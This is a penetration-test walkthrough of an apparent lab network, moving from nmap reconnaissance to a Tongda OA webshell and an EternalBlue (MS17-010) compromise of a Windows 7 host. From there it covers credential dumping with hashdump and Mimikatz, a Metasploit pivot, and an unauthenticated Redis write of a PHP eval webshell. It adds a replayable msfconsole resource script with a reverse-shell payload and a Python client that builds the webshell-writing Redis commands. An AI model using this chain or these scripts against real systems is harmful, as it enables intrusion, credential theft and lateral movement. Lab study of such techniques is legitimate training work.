```text
nmap -sS -A 192.168.12.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 03:20 EST
Nmap scan report for 192.168.12.136
Host is up (0.00077s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         nginx
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry
|_/
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B6:97:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS CPE: cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7
OS details: Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7
Network Distance: 1 hop
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-02-24T16:20:29+08:00
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:b6:97:9f (VMware)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-02-24T08:20:29
|_  start_date: 2022-02-24T07:19:44

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.12.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.05 seconds
```

Nmap escapes the HTTP title because the page is not UTF-8; the bytes are GBK and decode to 通达OA网络智能办公系统 (Tongda OA network intelligent office system), which already identifies the web application before it is opened in a browser.
```text
nmap --script=vuln 192.168.12.136 -p 445,139,135 -T4 -v
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-24 03:46 EST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:46
Completed NSE at 03:46, 10.00s elapsed
Initiating NSE at 03:46
Completed NSE at 03:46, 0.00s elapsed
Initiating ARP Ping Scan at 03:46
Scanning 192.168.12.136 [1 port]
Completed ARP Ping Scan at 03:46, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:46
Completed Parallel DNS resolution of 1 host. at 03:46, 0.01s elapsed
Initiating SYN Stealth Scan at 03:46
Scanning 192.168.12.136 [3 ports]
Discovered open port 139/tcp on 192.168.12.136
Discovered open port 445/tcp on 192.168.12.136
Discovered open port 135/tcp on 192.168.12.136
Completed SYN Stealth Scan at 03:46, 1.14s elapsed (3 total ports)
NSE: Script scanning 192.168.12.136.
Initiating NSE at 03:46
Completed NSE at 03:46, 14.99s elapsed
Initiating NSE at 03:46
Completed NSE at 03:46, 0.00s elapsed
Nmap scan report for 192.168.12.136
Host is up (0.00062s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:B6:97:9F (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

NSE: Script Post-scanning.
Initiating NSE at 03:46
Completed NSE at 03:46, 0.00s elapsed
Initiating NSE at 03:46
Completed NSE at 03:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds
           Raw packets sent: 6 (248B) | Rcvd: 4 (160B)
```
The vuln scan reports the host as vulnerable to MS17-010 (CVE-2017-0143, SMBv1), and port 80 is serving HTTP through nginx. The earlier SMB scripts also show that message signing is not required and that the check ran as the guest account, so the SMB stack is reachable without credentials.
3. Tongda OA - Getshell

Opening port 80 in a browser shows a Tongda OA (通达OA) installation.

Run the Tongda OA all-in-one exploitation tool directly against it.

Upload a webshell, then connect to it with AntSword (蚁剑).
4. MS17-010

Use exploit/windows/smb/ms17_010_eternalblue and set the target IP (RHOSTS).

Dump credentials from the resulting session.

Enumerate the interfaces to find the internal network segment.

Migrate the process: run post/windows/manage/migrate

Add a route to the internal segment: run post/multi/manage/autoroute

Scan the other network segment through the pivot:
```text
msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set ports 22,23,80,443,8080,8081,3389,445,143,6379
ports => 22,23,80,443,8080,8081,3389,445,143,6379
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.0.20.0/24
rhosts => 10.0.20.0/24
msf6 auxiliary(scanner/portscan/tcp) > set threads 20
threads => 20
msf6 auxiliary(scanner/portscan/tcp) > run
```
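The whole EternalBlue-to-pivot sequence from this section, written out as a msfconsole resource script so it can be replayed with `msfconsole -r pivot.rc`. This is an added example, not part of the original write-up: the attacker address 192.168.12.128 (LHOST), the session id 1, the 30-second wait for the callback and the 10.0.20.0/24 subnet supplied to autoroute are assumptions; the target, ports and modules are the ones the write-up uses.

```text
# pivot.rc  (added example; run with: msfconsole -r pivot.rc)
# Assumptions: attacker at 192.168.12.128, first Meterpreter session gets id 1,
# internal segment 10.0.20.0/24 as seen on the second interface in the write-up.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.12.136
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.12.128
# run as a background job so the script can continue; a failed EternalBlue
# attempt against Win7 can blue-screen the target, so check the job output
exploit -j -z
sleep 30

# get out of the exploited process before doing anything noisy
use post/windows/manage/migrate
set SESSION 1
run

# credentials: SAM hashes first, then Mimikatz (kiwi) for what LSASS holds
use post/windows/gather/hashdump
set SESSION 1
run
sessions -C "load kiwi" -i 1
sessions -C "creds_all" -i 1

# list interfaces to discover the internal segment (10.0.20.x in the write-up)
sessions -C ipconfig -i 1

# route that segment through the session
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 10.0.20.0
set NETMASK 255.255.255.0
run
route print

# same port sweep as the write-up, now carried over the pivot
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.20.0/24
set PORTS 22,23,80,443,8080,8081,3389,445,143,6379
set THREADS 20
run
```

`sessions -C` runs a Meterpreter command on a session without dropping into it, which is what keeps the resource script non-interactive; `route print` confirms the autoroute entry before the scanner is started. If the callback takes longer than the sleep, the post modules fail with "session not found" and can simply be re-run once `sessions -l` shows the session.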
The sweep finds 10.0.20.99 with Redis (6379) open, and redis-cli connects without authentication. Because CONFIG SET is allowed, the working directory and RDB filename can be pointed at the phpStudy web root so that SAVE writes the database dump as a PHP webshell:

```text
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename shell.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>"
OK
10.0.20.99:6379> save
```

The resulting file is a real RDB dump, so the one-liner sits between the binary RDB header and trailer; PHP still executes it because everything outside the `<?php ... ?>` tags is emitted as literal output. The technique needs the Redis process to have write access to the web root, and any of requirepass, protected-mode, binding to localhost, or renaming CONFIG in redis.conf stops it.
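To make the preconditions explicit, here is an added example (not code from the write-up) of a minimal RESP client: it checks whether the target answers CONFIG without AUTH and whether CONFIG is still available (not renamed away or ACL-denied), and it builds the same four commands from the redis-cli session above as raw protocol frames. The host 10.0.20.99, web root and payload are taken from the write-up; the function names and the classification labels are this example's own.

```python
# Added example, not from the original write-up: a small RESP (Redis protocol)
# client. Host, web root and payload below come from the write-up; function
# names and result labels are assumptions made for this example.
import socket


class IncompleteReply(Exception):
    """More bytes are needed before one whole RESP reply can be parsed."""


class RedisError(Exception):
    """An error reply (-ERR, -NOAUTH, -NOPERM ...) carried as a value."""


def encode_command(*args: str) -> bytes:
    """Encode a command exactly as redis-cli does: a RESP array of bulk strings."""
    frame = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        frame.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(frame)


def parse_reply(buf: bytes, pos: int = 0):
    """Parse one RESP reply starting at buf[pos]; return (value, next_pos)."""
    end = buf.find(b"\r\n", pos)
    if pos >= len(buf) or end == -1:
        raise IncompleteReply()
    kind, line, nxt = buf[pos:pos + 1], buf[pos + 1:end], end + 2
    if kind == b"+":
        return line.decode(), nxt
    if kind == b"-":
        return RedisError(line.decode()), nxt
    if kind == b":":
        return int(line), nxt
    if kind == b"$":
        n = int(line)
        if n == -1:
            return None, nxt                    # null bulk string
        if len(buf) < nxt + n + 2:
            raise IncompleteReply()
        return buf[nxt:nxt + n], nxt + n + 2
    if kind == b"*":
        n = int(line)
        if n == -1:
            return None, nxt                    # null array
        items = []
        for _ in range(n):
            item, nxt = parse_reply(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type byte {kind!r}")


def classify_config_reply(reply) -> str:
    """What the reply to CONFIG GET dir says about the target's exposure."""
    if isinstance(reply, RedisError):
        msg = str(reply)
        if msg.startswith("NOAUTH"):
            return "auth-required"              # requirepass set: technique blocked
        if msg.startswith("NOPERM"):
            return "acl-denied"                 # Redis 6+ ACL forbids CONFIG
        if "unknown command" in msg.lower():
            return "config-disabled"            # rename-command CONFIG "" in redis.conf
        return "error"
    if isinstance(reply, list) and len(reply) == 2 and reply[0] == b"dir":
        return "unauth-config-writable"         # the state the write-up exploits
    return "unexpected"


def webshell_write_plan(webroot: str, filename: str, payload: str) -> list:
    """The four redis-cli commands from the write-up as raw frames.
    SAVE writes an RDB file whose header and trailer surround the payload; PHP
    prints the bytes outside <?php ... ?> and runs the rest. Redis needs write
    access to webroot, and dir/dbfilename stay changed until restored."""
    return [
        encode_command("CONFIG", "SET", "dir", webroot),
        encode_command("CONFIG", "SET", "dbfilename", filename),
        encode_command("SET", "1", payload),
        encode_command("SAVE"),
    ]


def probe(host: str, port: int = 6379, timeout: float = 3.0) -> str:
    """Send CONFIG GET dir over a real socket and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("CONFIG", "GET", "dir"))
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            buf += chunk
            try:
                return classify_config_reply(parse_reply(buf)[0])
            except IncompleteReply:
                continue


if __name__ == "__main__":
    # Target from the write-up; only reachable through the autoroute pivot.
    print(probe("10.0.20.99"))
    for frame in webshell_write_plan("C:/phpStudy/PHPTutorial/WWW/", "shell.php",
                                     "<?php @eval($_POST['xt']);?>"):
        print(frame)
```

Running `probe` first is the check a practitioner wants before touching dir and dbfilename: only "unauth-config-writable" means the session above will work, and the other labels name the exact redis.conf or ACL setting that is blocking it. Because the frames are built by `encode_command`, the same bytes can be replayed through any tunnel that carries raw TCP to the pivoted host.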